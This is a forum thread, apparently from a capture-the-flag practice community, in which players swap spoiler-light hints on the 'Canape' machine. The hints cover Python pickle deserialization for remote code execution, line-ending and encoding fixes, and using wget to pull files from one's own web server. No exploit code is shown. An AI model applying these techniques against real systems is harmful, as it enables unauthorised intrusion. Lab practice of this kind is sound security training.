could use some help…found the vector.stuck at creating payload… how to run multiple commands in the same line for python, plan is to make initial string comment then payload
@genxweb said:
@SpicyCrack3r put the files in your web directory and do a wget to your ip/file and download that way.
thx, easy way is gone from my eyes
Advice for the initial foothold:
Try working on it locally first and get something basic working.
Agreed. Guys, this box is somehow refreshing … 
Great time.
I have the app running locally but I still can’t get RCE. When I generate the payload for RCE and the app creates the .p file locally, I try to run it in my own python interpreter with the “vulnerable” library and method I get the following error:
ImportError: No module named os
Running dos2unix on the .p file containing the exploit fixes the issue. I still can’t get RCE b/c I think my exploit is being generated incorrectly (I’m doing it in Kali so I have no idea why dos2unix has an effect) and this in turn isn’t working in the app. If I generate the payload and then execute it in the same script (i.e. non-interactively and bypassing the app altogether) it works fine. This is very frustrating and any help would be appreciated.
@mikekhusid said:
I have the app running locally but I still can’t get RCE. When I generate the payload for RCE and the app creates the .p file locally, I try to run it in my own python interpreter with the “vulnerable” library and method I get the following error:ImportError: No module named os
Running dos2unix on the .p file containing the exploit fixes the issue. I still can’t get RCE b/c I think my exploit is being generated incorrectly (I’m doing it in Kali so I have no idea why dos2unix has an effect) and this in turn isn’t working in the app. If I generate the payload and then execute it in the same script (i.e. non-interactively and bypassing the app altogether) it works fine. This is very frustrating and any help would be appreciated.
at this very moment I am exactly on the same spot, (not with the chars no need dos2unix) also with some modifications I get BadPickleGet: 111, the reason you may have to pass dos2exploit is because you need to understand what format is the data saved to the file… check cPickle online…
This machine is awesome. I did not make a shell via RCE yet, but i love the way to hack it.
I’ve got a shell since yesterday, quite easy in the end. Now, on my way to impersonate another user to get user.txt … so far, I’m having lots of fun with this one!
Well, after a short break , I got back to @canape. P0wned. For those who are struggling with it, here’s a tip: it’s easy. Once you got a shell, the rest is like a walk in the park. As someone had already said, the first foothold was fun. Then, pretty boring.
Any ideas about root? PM please
Stuck on Canape for a few days. Getting 500 Internal Server error. Anyone able to give me a nudge?
My earlier issue had to do with encoding.
@mikekhusid said:
I have the app running locally but I still can’t get RCE. When I generate the payload for RCE and the app creates the .p file locally, I try to run it in my own python interpreter with the “vulnerable” library and method I get the following error:ImportError: No module named os
Running dos2unix on the .p file containing the exploit fixes the issue. I still can’t get RCE b/c I think my exploit is being generated incorrectly (I’m doing it in Kali so I have no idea why dos2unix has an effect) and this in turn isn’t working in the app. If I generate the payload and then execute it in the same script (i.e. non-interactively and bypassing the app altogether) it works fine. This is very frustrating and any help would be appreciated.
This incredibly helpful message is usually caused by having the wrong line endings. Submitting multiline text in your browser that has unix line endings /n usually ends up with the browser encoding it and changing the line endings into /r/n (if you look at the web request it probably has a %0D%0A in it, if that’s the case just remove the %0D’s since you only want unix style line endings and that should fix the problem. Alternatively you can url encode your text first. (sorry for the non-specific answer but trying not to give anything away)
can anyone help me out with the initial first step on this box. I have exhausted everything with no luck for hours
Stuck at priv to user in local machine. I found a interested file but can not crack the hash in it. Any hints?
Can not make RCE work 
I used generator payload from github. Boring is safe
Feeling Good, got root. Hint for that box do not assume anything and read more. Try Harder !!!
@dmknght said:
Can not make RCE work
Not sure if you are talking about the initial foothold or a point further along, in the first case check how you are encoding whatever you have. If possible test it locally using whatever you have found and you will be able to see more info on why it is failing. I can’t really post more details here but feel free to message me with any questions about this box and I’ll give whatever hints I can (without spoiling anything of course).
@Ic3M4n said:
@dmknght said:
Can not make RCE workNot sure if you are talking about the initial foothold or a point further along, in the first case check how you are encoding whatever you have. If possible test it locally using whatever you have found and you will be able to see more info on why it is failing. I can’t really post more details here but feel free to message me with any questions about this box and I’ll give whatever hints I can (without spoiling anything of course).
I think i did not use right encoder. I did not enumerate the machine and information for exploit enough as well. I am doing other boxes and i will back to this box when I feel ready. Thanks for your help 
DM me if you are stuck at priv esc. I want to discuss it